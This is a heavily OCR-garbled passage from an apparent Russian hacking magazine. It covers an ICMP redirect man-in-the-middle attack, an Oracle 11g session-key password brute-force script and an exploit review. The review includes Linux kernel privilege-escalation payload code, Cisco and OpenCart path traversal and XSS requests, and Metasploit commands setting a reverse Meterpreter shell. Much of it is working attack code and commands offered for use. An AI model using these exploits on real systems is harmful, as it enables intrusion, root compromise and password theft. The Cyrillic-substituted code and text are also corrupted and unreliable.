вить их на роутер Н2. И перешлет их на Н2. ОИ О ООО ОО Я ОВ ООО О О В КЕ Е ВОО ВН О ЧН РИ Я О О В Я Я ВН О ве ВЯ НЯ 


Но если на В1 включена нотификация 1СМР Туре = 
геанест, то В1 заметит, что Н2 и хост А находят- 
ся в одном сегменте. А из этого, в свою очередь, 
следует, что путь напрямую от А к В2 и далее, 
то есть без участия НА1, будет рациональнее. 
Если все «сходится», то В1 посылает на хост А со- 
общение |1СМР геанес+. Если ОС хоста А поддер- 
живает такого вида сообщения, то она сама до- 
бавит новый маршрут в свою таблицу. Вообще, по стандарту только сетевые 
девайсы имеют право отправлять такие сообщения, но, как ты понимаешь, 
для нас это прямой путь для наших манипуляций :). 

Теперь давай ближе к практике. Все, что нам требуется в качестве инстру- 
мента, — это отправлять 1СМР гедпес{ запросы. Формат пакета — на рис. 2. 
Поясню, так как это важно. Код — 1, тип — 5, которые указывают, что это 
именно гедтес{ для хоста, потом стандартная чек-сумма. Далее должен быть 
|Р-адрес более «правильного» роутера. И самый «скользкий кусок» для нас — 
заголовок !Р пакета и первые 8 байт тела пакета, который был получен роуте- 
ром, но для которого есть более короткий путь. Что с этим делать, я объясню 
чуть позже. 

Дальше. Необходимо знать остальные правила, по которым действуют 
ОС, получающие |СМР гейдтес{ пакеты. В смысле, для того, чтобы ОС обрабо- 
тала пакет и добавила новый роут по нему, должны соблюдаться следующие 
условия: 

1. |Р-адрес нового роутера должен быть в той же подсети, что и сам хост. 
2. Сам 1СМР гедиес{ должен прийти от роутера, который используется хо- 

СТОМ. 

3. В качестве нового роутера не может быть указан сам хост. 
4. Новый роут не может быть добавлен для !Р-адреса, который находится 

в той же подсети, что и сам хост. 

5. И самое тривиальное — ОС должна поддерживать и обрабатывать 1СМР 
геанес{ пакеты. 


Начнем с конца. На самом деле 1СМР гедиес{ кажется вполне юза- 
бельной фичей — динамически находятся более правильные маршруты. 
Но фактически он будет использоваться в сети лишь в том случае, если 
сама архитектура сети некорректна. При правильной таких проблем просто 
не возникает. Наверное, это и стало причиной, по которой от этой техноло- 
гии постепенно все отказываются: вроде как большинство современных 
*пх-систем по умолчанию не обрабатывает их, а сетевые девайсы их не ге- 
нерят. Но приятное исключение составляют ОС до \\ММпао\м$ ХР/2003 вклю- 
чительно — в них |СМР гедйес{ поддерживается и включен по умолчанию (в 
\${а/2008 — отключен). 

Если обобщить описанные выше правила, то для проведения успешной 
атаки мы должны соблюсти следующие моменты: 

1. Мы должны находиться в той же подсети, что и хост нашей жертвы (хостА). 
2. Хост, роут до которого мы хотим изменить (хост В), должен находиться 
в другой подсети. 


Соде Неадег спескзит 
|Р адаге5$ 


|Р пеадег апа #г${ 8 Б\е$ ог опдта! даадгат'$ даа 


Рис. 2. Форматпакета1!СМР ге4пес{ 


Достаточно просто, но куда же делся тот «скользкий кусок»? По теории, 
для того, чтобы добавить новый роут на хост, мы должны втело |СМР гедйесРа 
добавить |Р-заголовок и часть тела пакета от хоста (рис. 3). Но откуда нам его 
взять для атаки, если мы не видим данных между роутером и хостом? В те- 
ории это стало бы для нас нерешабельной проблемой, но на практике все 
гораздо проще, так как винда не смотрит, «а посылала ли она этот пакет». 
Главное, чтобы было некое «тело». Кроме того, отсутствие этой проверки 
позволяет добавить нам в таблицу маршрутизации роуты даже до хостов, 
к которым наша жертва никогда и не подключалась. 

Теперь практический пример. Общее описание ситуации: 

. 192.168.79.130 — жертва на \\ т ХР; 

. 192.168.79.137 — хост атакующих, то есть нас; 

. 192.168.79.2 — основной роутер жертвы, он же «дземау»; 
. 8.8.8.8 — ОМ$-сервер жертвы (от Гугла). 


Таким образом, мы находимся в одном сегменте с жертвой, а второй 
хост (8.8.8.8), роут до которого мы хотим изменить и пустить данные через 
нас, находится где-то вне сегмента. То есть изначально данные от жертвы 
идут через роутер к ОМ$-серверу, а после атаки будут идти через нас. 

Провести атаку можно различными тулзами — это и классический 
ЕЦегсар, и виндовый Щегсерлег-МС. Но мне приглянулся Незропаег 
от рае! аБ$ (аоо.9!/\72у). Это набор тулзенок на РуПоп’е, специально 
сделанный для различных атак в \/Итао\м5$-сетях. Атака проводится всего 
одной командой: 


руЕПоп Тстр-Вед1гесе.ру -тТ ефи@ -1 192.168.79.137 -в «= 
192.168,79,2 -Е 192,168.79,139 п 8.8.8.8 


Расписывать, что есть что, не буду. Если соотнести с общей схемой 
сети, то все должно быть понятно. Можно разве что отметить несколько мо- 
ментов. Во-первых, новый роут добавляется временно — на десять минут. 
Но мы можем повторять атаку сколько угодно раз. Во-вторых, мы можем 
добавить любое количество роутов до хостов (даже к тем, к которым жерт- 
ва еще не подключалась). В-третьих, сама эта атака будет полудуплекс- 
ная (Па!-аир!ех), то есть подключения из «внешних» сетей мы перехватить 
не сможем, поскольку обмануть таким образом сам роутер не получится. 
Кроме того, при проведении МП М-атаки нам надо будет учитывать, что под- 
ключение к удаленному хосту надо делать со своего |Р-адреса, а не от име- 
ни жертвы, по этой же причине. Итог атаки можно увидеть на рис. 4. 


НО ТОР еоаБаюе в лоб етРася 
„ ИМО РОНЕТ Рада у РС] 


ЕГО рЛеЕ Назрваь 


Е к 
10 


Ч Е 


В тотегпет Рготосо\ Мегз1оп 4, 5гс: 192.168.79.130 (192,158,79.130), 051: 8.8.8.8 (3.8.8.8) 


Мопиоге Соле ог боба 


Нем Соеиье бол Гы ий 


Рдрейу вт 
ЕЕ, НОС ЗВ-В2-0 3 
РАафеи 192. 11658.79. 120 
Бфаткой В ее а а 
Герай Севреченыу А-В 

СН Белла РИ 

ЗАМ, Бвгьмы 


Рис. 3. Пакет!СМР геднес{ «вживую» 


М тетагпат солтго| Маззада Ргатоев| 


Цзег баелогат Рготосо1, 5гс Роге: дотаап (53), 05% Роге: дотлтп (53) 


Рис. 4. Эффект!СМР гед4песганатаблицу маршрутизации 


Еазу Наск 
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«ОБОЙТИ АУТЕНТИФИКАЦИЮ» В ОВАСЕЕ 116 


РЕШЕНИЕ 

СУБД Огасе очень распространенный продукт, а для многих даже слишком 
критичный. Ведь база данных — это чаще всего сердце (хотя по своим функ- 
циям — хранить и выдавать информацию — это, скорее, жировые отложения) 
любого крупного проекта. По опыту могу сказать, что в корпоративных сетях 
именно СУБД часто оказываются слабым звеном. И потому я постараюсь 
описать какие-то интересные проблемы в этой области. 

Для начала же мы поговорим о нашумевшей уязвимости, о которой не так 
давно было рассказано на конференции ЕКорацу. Нашел ее Эстебан Марти- 
нес Файо (ЕЗебап Майтехй Гауо). Суть ее в том, что мы можем тайком пере- 
бирать пароль к СУБД Огасе 1149 (11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, 11.2.0.3). 
Наверное, сначала следовало бы рассказать о самом процессе аутентифика- 
ции в ОгасЕ 11, но в связи с ограниченностью Еазу Наск’а и «остывающей» ак- 
туальностью дырки (в октябре наконец-то вышел нормальный патч от Огасе) 
я оставлю подробную теорию для следующего номера, а сейчас кратко. 

Когда кто-то пытается подключиться к БД, он отправляет имя пользова- 
теля. Сервер же в ответ посылает случайный сессионный ключ и соль, с по- 
мощью которых пользователь сможет зашифровать свой хеш пароля и отпра- 
вить его на сервер. 

Так вот, уязвимость состоит в том, что на основании имеющегося сесси- 
онного ключа и соли хакер имеет возможность перебирать пароли (точнее, 
хеши паролей). Причем достаточно быстро. По РА-заявке — 5 часов на вось- 
мибуквенный пароль. Причем в СУБД даже не останется логов о неверном 
вводе пароля! Хакер, просто подключившись к СУБД и указав правильный О 
базы данных (заполучить его просто) и имя пользователя (например, стан- 
дартного $$, ЗУЗТЕМ), получит от сервера сессионный ключ и соль. Далее 
он отключается от СУБД (пароль не вводил, а потому и записи в логах нет). 
И все! Теперь он может где-то у себя запустить перебор и ждать итогов. 
По мне, так шикарная атака. Но давай присмотримся, почему это возможно. 
Это интересно. 

Сессионный ключ — это случайное число длиной в 40 байт. Сессионный 
ключ зашифрован с использованием АЕ$. Клиенту необходимо расшифро- 
вать сессионный ключ, для того чтобы потом использовать его для шифрова- 
ния своего пароля (но это сейчас не так важно). 

Для того чтобы расшифровать сессионный ключ, клиенту нужна соль 
и свой пароль. Он их конкатенирует и хеширует ЗНА-1: 


Кеу Рог _5е5$1оп_Кеу=$На1 (раз5мога+$а1+); 


Но это все не так важно. Важнейший момент — это то, что АЕ$ — блочный, 
СВС-алгоритм. А это значит, что работает он с блоками. Размер — 16 байт. 
Но посмотри выше. Длина сессионного ключа — 40 байт. Значит, чтобы за- 


1трогЕ Ба$р11Ь 
гот Сгурфо.СтрНег 1троге АЕЗ 


Че+ десгурт (5е551оп,5а11 ‚раз5мога): 
раз НазН = Ва$р116. зВа1 (раз5мог0+5а11) 


алые фе Г В г шеф шаша  # 24 Г В И? 


Кеу = раз$ ПазН.01ее$т() + '\хо9\хее\хов\хоо" 
Десгурфог = АЕЗ.пем(Кеу,АЕ$.МООЕ_СВС) 

рТа1п = десгурфог .десгур* (5е5510п) 

гефиги р]а1п 


аа ааа пони зн ння 48 ея 


шифровать, данные должны быть дополнены. И, как говорит Эстебан, здесь 
был главный прокол 11-й версии аутентификации (метод аутентификации 
в каждой версии свой — в 9, 10, 11, 12-й. Вот психи!). Для паддинга (дополне- 
ния данных) используется метод от стандарта РКС$7. Он гласит, что значение 
каждого байта должно быть равно количеству добавляемых байт. Добавляем 
3 байта — будет значение «03 03 03», добавляем 5 — «05 05 05 05 05». 

И так как для заполнения последнего блока АЕЗ не хватает 8 байт (40 - 3х 
х 16 =-8), то в конец сессионного ключа добавляется РКС$7 паддинг «08 08 
08 08 08 08 08 08». 

Для получения зашифрованного вида сессионного ключа (того, что клиент 
получает от сервера) используется примерно следующая формула: 


Е_°К= АЕЗ_192_СВС ($К+ {0х08}*8, $°Па1 (ра$$мог4+$а1{)); 


. Е 5К — зашифрованный сессионный ключ; 
. К — сессионный ключ. 


Так вот, эта постоянность добавочных данных и есть причина проблемы. 
Мы можем устроить брутфорс и проворачивать обратную операцию — рас- 
шифровывать полученный нами от сервера зашифрованный сессионный 
ключ с различными значениями пароля, а проверять успешность расшифров- 
ки по строчке паддинга (08 08 08 ...). 

Практическая реализация есть на РУпоп’е — аоо.9!/йа1| (просто, что- 
бы понять идею), но для реального перебора лучше воспользоваться 
уЧоппТпеРюрег с ]итбо-паком (900.91/4319]). 

Надеюсь, идея атаки понятна. Мы подключаемся, получаем данные от сер- 
вера и пытаемся расшифровать эти данные с различными значениями паро- 
лей. Успешность нахождения пароля определяем по получаемому паддингу. 
В конце осени Огасе закрыла уязвимость тем, что отказалась от 11-й версии 
протокола. И теперь новые версии работают под 12-й (в ней паддинг случай- 
ный), те, кто не могут, — на 10-Й. 

Не могу не пословоблудить. На самом деле, кипиш из-за этой уязвимо- 
сти поднялся большой. Даи ОгасеЕ, как всегда, странно себя вела. Но, ИМХО, 
Огасе какой раз старается изобрести велосипед — безопасную версию ау- 
тентификации. А это дело не очень простое, потому и получают. Таже Мсго$ой 
сее 5О!-сервером совсем не парится по этому вопросу. В нем без проблем 
можно получить МТМ`’ом логин и пароль, но М$ сказала, что не будет исправ- 
лять эту уязвимость. Говорит: хотите безопасно — юзайте 55Ё или стороннюю 
аутентификацию... 

Ну воти все. Надеюсь, что было интересно :). Если есть пожелания по раз- 
делу Еазу Наск или есть желание поресерчить — пиши на ящик. Всегда рад :). 


== 


И успешных познаний нового! 2 


5е5510п_Пех = 'ЕА2043СВ8846ЕЗ864311С6880С161Е8СА170363С1ЕбБЕ57Е3ЕВС64352541А82398608ВА16ЕААВ542255347598143Е7 8767" 


#8. Г 19 и 3 К? 
5а1{ Пех = 'А7193Е546377ЕС56639Е" 


раззмог@$ = ["Жез{','раззмога' , "огас1е' , 'дето' ] 


Фог раз5могд 4п раз$мог@4$: 


5е5510п_14 = 4есгурт ($е$$1оп_Пех.4есойе( "Пех') ,за]{_Вех.4есофде( 'Вех') ‚раз5мюга) 
рг1п{ ‘'бесгурфе 5е$$1оп_14 Рог раззмог "%5" 15$ 45" № (ра$змога, зе$51оп_14.епсоде('Вех")) 


1+ е551оп 19[469: ] 
рг1пт "РАЗЗМОВО 15$ "%5"' № раззмога 
ЬгеаК 


Ру{Поп-скрипт для перебора паролей ксессионному ключу для Огас!е 1143 


== '\х08\х08\х08\х08\х0о8\хо8\х08\хО8': 
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У\УАВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 
Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 


У 


Борис Рютин, ЦОР (Езаде [аБ) 


Этот месяц можно назвать весьма 
продуктивным. Исследователи обра- 
довали нас сразу нескольким уязви- 
мостями для ядра Ипих. Также в наш 
обзор вернулись продукты от С!5со. 
Ну и традиционный 0-дау для чама. 


ОБЗОР 
ЭКСПЛОЙТОВ 


АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 


СТР СЕТ. А$$0С _УТАГУ()' — 1еп = т1"и_*( _ф, Теп, (5а5)); 
ПЕРЕПОЛНЕНИЕ БУФЕРА В ЯДРЕ ИМОХ Коммит можно посмотреть в 9й-репозитории 


С\$$у2: 7.2 (А-У/АСТУ/Ац:М/С:СЛЕСГА:С) ЕХРЕСИТ. Для эксплуатирования ошибки нам нужно обратиться к сокету 
Дата релиза: 23 марта 2013 года ЗСТР_ОСЕТ_АЗЗОС ЗТАТЗ$ и получить флагс помощью функции о оскор{и 
Автор: Рег Маюизек буфером больше, чем поддерживает сокет. 

СУЕ: 2013-1828 


#4ейпе $СТР_СЕТ_А$$0С_$5ТАТЗ 112 
Кто бы что ни говорил, а ошибки типа переполнения буфера допускали, до- #Аейпе $0Е_$СТР 132 
пускают и будут допускать. В этот раз подобный баг проявился в ядре Шпих. 
Ошибка была допущена в сокете ЗСТР_ СЕТ_АЗЗОС_$ТАТФ, где длина запра- 


шиваемого буфера проверялась только лишь на минимум. о СЙ г *Бит = "АААААААААААААААААААААААААААААААААААААААААААААААА 
ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
Е $сфр_вефзоскор{ а$50с_5Фа%$( иСЕ $О0СК *$К, += ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
` еп, __ мег *ор®\а\1, __ мег *орТеп ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" ; 
5оск1еп_* 1еп = $&г1еп(Би+); 
+а = зоскее(АЕ_ТМЕТ, $ОСК_5ТКЕАМ, ТРРВОТО_5СТР); 
(1еп < $517е0+(5с&р_а$$0с_+)) вее5оскор*(+а, 5$01_$5СТР, $СТР_СЕТ_А$50С_$ТАТ$, Би+, &1еп); 
-ЕТММАЕ; 
(сору_Ргот_изег (&за$, ор%\а1, 1еп)) ТАРСЕТФ. Цпих Кете!3.8.2. 
-ЕРАЦЕЁТ; 


ЗОШИТОНМ. Вендор уведомлен, поэтому остается ждать обновления отком- 
Исправили это довольно просто: митеров дистрибутивовлибо пересобрать ядро самостоятельно. 
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НЕСКОЛЬКО УЯЗВИМОСТЕЙ В (1$С0 МОЕЙ 
ЗИВУЕШЕАМСЕ ОРЕВАТОМ$ МАМАСЕВ 


С\$$у2 7.8 (АМ:В/АСТ/Аи:М/С:СЛ:М/А:М) 
Дата релиза: 3 марта 2013 года 

Автор: Ваззет 

СУЕ: М/А 


Давно в наш раздел эксплойтов не попадали продукты С15со, но, как говорит- 
ся, «если замок сделал человек, то человек его же и сможет взломать». В этот 
раз атакующий может читать системные файлы через геаа _1о9.]5р и геад_109. 
ер, в которых нет проверок имен и путей файлов. 


ргофесфеа 11пКеаЕ1$& веЕВинЕраЁов( $4г1п= 105Мате, + 
5г1и8 +ПеОгаег) { —_ ОНИ 
_5Ег1п8 1ТоёРафИ = "/изг/ВИИЕра/105$/"; 


__  ощгаив «Неьов = 1орРафн + 1оМате; 


_ __ Е1ике91$% гези14Е1$% = пем Е1пКед1$%(); 


лы 2 
Ви РегедКеадег 1п = пем Ви РегедВеадег (пем «= 
Е1]еКеадег (+ПеЁоё)); 

5Ег1п8 «ПеЕ1пе = ""; . - РНИИ 

имИ11е(_(+ПеЁё1пе = 1п.геад1пе()) != пи11 ) { 
1+(_ЕНеогаег .1паехоО+ ( "дезсепд91п8") > -1 ) { 
___ Ге$и14Е15% .аааЕ1г$* (Пе 1пе); _ 

} е15е {| ИИ 
__ _ гези14Е15$% .а4даЁаз* (Пете); _ 
} 


ЕХРЕСИТ .Примерчтения файлов: 


Вер: //зегмуег1р/ВИТ/и{11$/108$5/геаа_10о8.] зр?81ег=‹- 
ОЕ Иа и аа вы вы) О ЕС/разема, | 
ПЕЁр: / /зегуег1р/ВМТ/и{11$/1055$/геаа_1о8.)р?Я1Фег=е_ 


ТОВ Га ыы ыы] в / @СС/5Пайом. 


Помимо уязвимости типа чтения файлов, можно провести Х$5$-атаку че- 
рез главную страницу: 


< обеситуРоси$ 


зутащес Соппес{ 


А 4есптка! соттипку Гог Зутатщес сиз{отег$, еп@-изег$, деуе|!орег$, апд.р: 


ибо 915Си55ЮП ехроК 5оИ п геГегепсе5 


Ипих Кегпе! '5СТР_СЕТ_А$$О0С_$ТАТ$З()' $Зфаск-Вазе 


Видгаа ТО: 58389 

С1а55: Воипдагу СопаЙтоп Еггог 
СУЕ: С\УЕ-2013-1828 

Кетсе: № 

Госа!: Уе5 

Ри! 5Вечд: Маг 07 2013 12:00АМ 
ИрдаЁед: Маг 26 2013 10:06АМ 
Сгеди: Рег Матоизек 


Вед На! Еедога 17 
Ипих Кегпе! 


МитегаЫе: 


Описание уязвимости насайте 5есиг"у!оси$.сот 
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Пер: / /5егуег1р/мзот/1п4ех.рйир/" /{1Е1е><зсг1ре>а1ег* + 
("с15<с0х5$5" );</5сг1рЕ>. _ 


б0051е аогк: 1п411е: "У1аео бигуе111апсе Орега+10оп$ Мапарег > 
Ео51п". _ 


ТАВСЕТФ. Тестировалосьтолько на С!5со \Маео ЗигуеЙапсе ОрегаНоп$ 
Мападегб.З.2. 


ЗОБОТОН. Вендорбылуведомлен, но исправления до сихпор нет. 


РАСКРЫТИЕ ПУТЕЙ ЧЕРЕЗ ЕИЕМАМАСЕВ.РНР 
В ОРЕМСАВТ 1.5.5.1 


С\$$у2: 5.0 (АМ:В/АС/Ач:М/С:РЛ:М/А:М) 
Дата релиза: 19 марта 2013 года 

Автор: миагахе 

СУЕ: 2013-1891 


В этот раз причина уязвимости не в отсутствии защиты, а вее недостаточной 
продуманности. Программисты хотели не позволить атакующему читать дру- 
гие файлы и сделали фильтрацию символов «../» путем замены их с помощью 
функции г герасе. 


риб11с ФипсЕ1оп 41гес®огу() { 
$] оп = аггау(); _ | 

1+ (1$5е4($%11$->гедие$*->роз{[ '41гескогу'])) { 
$91гесфог1е$ = #106 (г%г1т(ОТВ_ТМАСЕ . 'дафа/'. + 
$&г_гер1асе("../', '", $%И1$->гедце$*->ро$*+ 
ашиесвову |’ и", БОВ. ОМЬУОТЕ ); 


Такую защиту можно обойти двумя способами: 
1. Если магазин установлен на сервере под управлением ОС М/паом.$, до- 
статочно запросить файл по правилам этой операционной системы <\..». 
2. Фильтр берет только символы «../», и достаточно немного поразмыслить, 
чтобы обойти его. Ниже показан пример. 


ЕХРЕСО!Т. Сложность эксплуатации заключается втом, что файл Нетападег. 
рир доступен только админу, поэтому атакующемутребуется «подбросить» 
свою страницусРО$Т-запросом кудаленному файловому менеджеру и пра- 
вильнымтокеном. 

Для ОС \ММтаоме5: 


<Ит1><Боду><‹сепег> _ Е ООО 
<фогт асЕ1оп=" Ир: //1оса11о$*/о0с1551/адт1п/1паех.рир?гоц%е=+= 
соттоп/Я]1етапазег/41гесфогу&{оКеп=92аабас3264с8е7а175с3Зас9+7+= 
754425" тефпоЧ="ро${" > № _ 
_ <«1при® %уре="И1а4еп" пате="91гесфогу" уа1ие="..\..\..\"> 
<1при® фуре="$и6т1{" уа1че="Те$*"> 
</Фогт> НИИ 
</сепфег></боду></Ит1> 


Для всех: 


<1приЕ фуре="И1а4еп" пате="а1гесфогу" уа1ие=е+ 


И 99: 9: / 9 9: Е РИ 9:0 ий вы Ей ы / ь 2 


После этого мы получим ответ в формате У$ОМ со всеми директориями на 
уровень выше от директории ОрепСац. 

В Нетападег.рйр находятся еще около 14 уязвимых функций, которые ис- 
пользуют «безопасную» конструкцию. Список самых интересных: 


руб11с ФипсЕ1оп 91гесфогу() — список подразделов 

риб11с ФипсЕ1оп #1е$() — список файлов с изображениями 

руб11с РипсЕ1оп сгеафе() — создание нового раздела 

руб11с КипсЕ1оп ае1ефе() — удаление файлов или разделов _ 
рчб11с ФипсЕ1оп тоуе() — перемещение файлов или разделов 
риб11с Фипс&1оп сору() — копирование файлов или разделов. 
риб11с ФипсЕ1оп гепате() — переименование файлов или разделов_ 
рчб11с ФипсЕ1оп ир1оаа() — загрузка файлов или разделов 


ТАВСЕТФ. ОрепСат1.4.х-1.5.5.1. 


ЗОШИТЮОМ. Патча отразработчика пока не поступало. 
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ПРАВА ВООТ ЧЕРЕЗ $0СК_О1Аб_НАМОГЕВ$ 


С\$$у2: 7.2 (АММ/АСТ/Аи:М/С:С/:С/А:С) 
Дата релиза: 25 февраля 2013 года 

Автор: Ма аз Кгаизе, ЗупО, $4 

СУЕ: 2013-1763 


Уязвимость находится в файле $оск_(ад.с, где через константу указано, что в 
ядре лежит массив из 40 указателей. 


$фа*1с сопзЕ $гисЕ $оск_Ч1ав_Иапа1ег *5оск_41аё_Папа1ег$«= 
[АР_МАХ]; 


При этом мы можем вызвать $оск_ад_гсу п$0() с параметром ЗОСК_ 
ОАС_В\У РАМПУ -> __5оск_Чад_гсу п$9 и произвольным значением $Чад_ 
Тагпйу, то есть больше стандартных сорока. Тогда зауказанным массивом ядро 
попытается взять указатель на структуру $оск_(ад_Папаег, где по смещению 
4 лежит указатель на функцию аитр(), которую затем попытается выполнить. 


// Возвращает адрес массива[наше_1-байтное_число] 
Юпа1 = $зоск_Ч1а=_1Тоск_Напа1Тег (геа->$5ЧА1а=_ат11у); 
те (ппа1 == МУ) 

егг = -ЕМОЕМТ; 
е15е 
// Вызов функции по указателю 

егг = Ипа1->ачтр($К6, п1й); 


ЕХРЕСИТ. Для эксплойта нужно найтиадрес вкуске памяти, лежащий после 
массива $оск_4ад_Пап ег [АР МАХ], который можно менять самим. Напри- 
мер: 


С1а487а@ Б зоск_41а_Папа1ег$ 
с1а48840 В Яом_саспе_вепта 
С1а48860 Б Ном саспе_51оБа1 
С1а48850 Б Ном саспе_вс_1оск 


с1а488е9 Ь п1_ фаб1е_изег$ 
С1а488е4 Б п1 фаб]1е 


с1а48980 В ргос_пе*_ пеЕя1 ег 
С1а489а@ В п+ Поок$_пеедеа 
Будем использовать п| чае: 


$фаЕ1с з&гисЕ пе11пК_фаб1е *п1_Фаб1е; 
${гисЕ пеф11пкК_фаб1е { 


5ЕгисЕ п]_р14_Па$й Пай; 
$гисе 111$*%_Пеаа тс_ 115%; 
$гисе 115$епег$ __гси *115%епег$; 
ип$1епе 11 п] попгоо*; 
ип$12пеа 11% 5гоцрз; 
5ЕгисЕ ми ех *сб_тифех; 
$ЕгисЕ моаи1е *тоач1е; 
Ти ге215%егеа; 

}; 

5ЕгисЕ п]_р1а_пазИ { 
5тгисЕ 011$%_Пеаа *таб]е; 
ип$1епе4 1о0п5 герпазй_11те; 
ип$1епе 11 так; 
ип$1впеа 11 $И1; 
ип512пе4 11% епфг1ез ; 
ип$151пе4 1п* тах_$5И1 +; 
и32 гпа; 


}; 


В итоге со смещением 4 байта по указателю на п! 1а Бе будет находиться 
«ипзапеа опа гепазй_4ите», в результате нескольких перезагрузок его значе- 
ние будет лежать в диапазоне 0х10000...0х20000. Поэтому выделим по этим 
адресам память с помощью ттар, забьем МОР’ами 0х90 и добавим наш 
рауоал: 


// Начальный адрес выделения памяти 
итар_$Фаг{ = 090х100060; 
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// Размер куска, такой длинный выбран из-за Еедога 
ттар_$17е = 90х120000; 
// Проверка на возможность записи 
1+ (мтар((\/0о1а*)ттар_$%аг%, мтар_$17е, РВОТ_ВЕАО | РВОТ_МВТТЕ | == 
РКОТ_ЕХЕС, МАР_РЕТУАТЕ | МАР_ЕТХЕО | МАР_АМОМУМОУ$, -1, 09) == + 
МАР_ЕАТЕЕО) { 
рг1п Е ("ттар Фау1*\п"); 
ех1{ (1); 
} 
// Забиваем МОР? ами 
тетзе* ( (мо1а*)ттар_$ФагЕ, 90х90, ттар_$17е); 
// Полезная нагрузка 
спаг Зитр[ ] = "\х55\х89\хе5\хЬ8\х11\х11\х11\х11\хЕЕ\хад\х5а\хс3"; 
ип$1пе4 1опё *а$4 = &)итр[4]; 
*а5А = (ипз12пе 1опР)Кегпе1_соае; 
// Копирование нашего рау1оаа в память 
тетсру(_(мота*) ттар_$5агЕ+ттар_$517е-$17ео0о+(3итр), ]итр, «= 
$17е0+(3итр)); 


Публичные эксплойты под разные дистрибутивы (Убит, РЕедога, Агсп 
Ч/пих) писались в основном на русском форуме «белошляпников» БИ.1у/\Е4 м. 


ТАВСЕТФ. ГпихКете!3.3-3.8. 


ЗОШИТОМ. Доступно обновление сисправлением данной ошибки отпроиз- 
водителя. 


ЛАМА СММ ВЕМОТЕ СОБЕ ЕХЕСИТОМ 


С\$$у2: 9.3 (АМ:В/АС:М/Аи:М/С:СЛ:С/А:С) 
Дата релиза: 29 марта 2013 года 

Автор: Неизвестен 

СУЕ: 2013-1493 


В очередной раз уязвимость первоначально была найдена злоумышленника- 
ми и эксплуатировалась в сплоит-паках. Уязвимость типа тетогу соггирНоп 
существует в функции СММ.сттСо!огСопуец, для обмана которой создают- 
ся два класса ВиНегеа!таде, где один с валидными полями проходит провер- 
ку за оба. С помощью созданного изображения с определенными растровы- 
ми параметрами можно вызвать падение приложения и далее прочесть или 
повредить память ММ. 


ЕХРЕСТ. В некоторыхнайденных эксплойтах первый класс называется 
|тАр!рпа, и это оправданно — из-за большого значения оффсета арпа-канала 
для буфера приемника. 


{И15.$0Р5е1$ 


пем 1"*[] { 0, 1, 2,3}; 
{015.0 $е*$ То, 1 5 


пем 1и[ ‚ 2, 50000000 }; 


2 


Инициализация «хорошего» и «плохого» класса несколько отличается, как 
раз в значении альфа-канала: 


Ти $ИМТаАЕИ = 168; 1пЕ $зНетей{ = 1; 
1и* зръфг14е = 4; 1пЕ $$5&г14е = зръ&г14е * $М1аей; 


[- 

[-) 

Го 

|3 

‚. 

„ - 
-- 5 - М И = 
свазь 
нын 

° 

4 

® 

$ 

Г: 

„ 


® зеза\го взсасе (752128 Бусез) со 192.178.1.137 


*] Месегртесег яезз1сп 10 


#47 ехр1оЕс(71ата спа) > зеззфола 1 
([*] Зсассаоо дотесасьзой маеь 3 
шесегргесег > вуз1пЕо 

Сошрасег 


[+ 


Месегргесег $ 07/1032 
шегетртесег >» сес: а 


Зегтеё ивегпраше; и14-7\Лаюло 


Использование эксплойта для 2013-1493 
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тие ЧМТаЕй = $и1аеИ; 1пе Нет = $зНезей*; 

11 ар5Ег14е = 1; 11 9$5%г1ае = 0; 

Со1ог5расе $с5 = пем ТмА1рйа.МуСо1ог5расе(9, «<= 
{И1$5.50+5е$.1епёеИ - 1); 

Со1огМоде1 ст = пем СотропепСо1огМоде1 ($с©$, «= 

Егие, а15е, 1, @); 

$атр1еМоде1 $5т = пем Сотропеп$атр1еМоде1(0, эитаЕп, == 
5Не1ей®, эрэ&г1ае, $55%г1ае, 1И1$5.50+5еф5); 

Ви Реге4Ттаве $61 = пем ТмА1рНа.МуВи+егеаТтаве ( $и1аеп, <= 
°<Не1еПе, 6, 9, $ст, $5т); 


Фог (11 = 0; 1 < $$5г1ае; 1++) { 
$61 .веЕКазег().веЕбафаВиРег(). зе Е1ет(1, 1); 
| 


Со1ог5расе ас = пем ТмА1рйа.МуСо1ог5расе(9, «<= 
{И1$5.Ч0+Р5еф$.1епёеИ - 1); 

Со1огМо4е1 аст = пем СотропепСо1огМоде1 (4с$, «= 

Егие, Фа15е, 1, @); 

$атр1еМоде1 азт = пем Сотропеп$атр1еМоде1(0, амтаеп, == 
АНе1ей*, ар5г1ае, а$5%г1ае, 1И15.ао+еф5); 
ВиРегедТтаяе 961 = пем ТтАТрНа.МуВиРегейТмтазе ( $ИТаеи, «= 
°<Не1еПф, 10, 0, аст, а5т); 


Здесь мы забиваем первый буфер единицами — зе Еет(:, 1), именно они 
и будут вызывать повреждение памяти. Сам процесс подмены заключается в 
переобъявлении некоторых методов стандартного класса ВиНегеа!таде. 

Создание эксплойта и нахождение уязвимости потребовало огромного 
количества знаний и времени, поэтому и анализ такого эксплойта потянет на 
полноценную статью. Причем такая статья уже написана, ктому же на русском 
языке, так что тем, кто хочет лучше разобраться, советую прочитать анализ от 
е!-, мембера форума Чатадеаь: ои.1у/10у1Мас. Этот форум уже радовал нас 
в прошлый раз запуском уауа-эксплойтов в паблик. 

Пример эксплуатации уязвимости с помощью Маазр/ оп: 


15+ > изе ехр1о01%/ти1{1/6гом5ег/Зауа_стт 
15+ ехр101*(3]ауа_стт) > зе ТАКСЕТ 1 
15+ ехр101*(]ауа_стт) > зеф РАУГОАО += 
м1п4ом$ / тефегргефег/геуегзе_{ср 
15+ ехр101*(]ауа_стт) > зеф ЕНОЗТ 192.168.24.141 
15+ ехр101*()]ауа_стт) > ехр10о1* 


ТАВСЕТФ. 
чама 7их-7и15 включительно; 
Чауа бих-би/А включительно; 
Чама 5их-5и40 включительно. 


ЗОШИТОНМ. Доступно обновление сисправлением данной ошибки отпроиз- 
водителя. 


УДАЛЕННОЕ ВЫПОЛНЕНИЕ КОДА В МОМбООВ 
МАПМЕНЕЕРЕВ.АРРИУ 


С\$$у2: 10 (АМ:В/АС/Ач:М/С:СЛ:С/А:С) 
Дата релиза: 24 марта 2013 года 

Автор: ада 

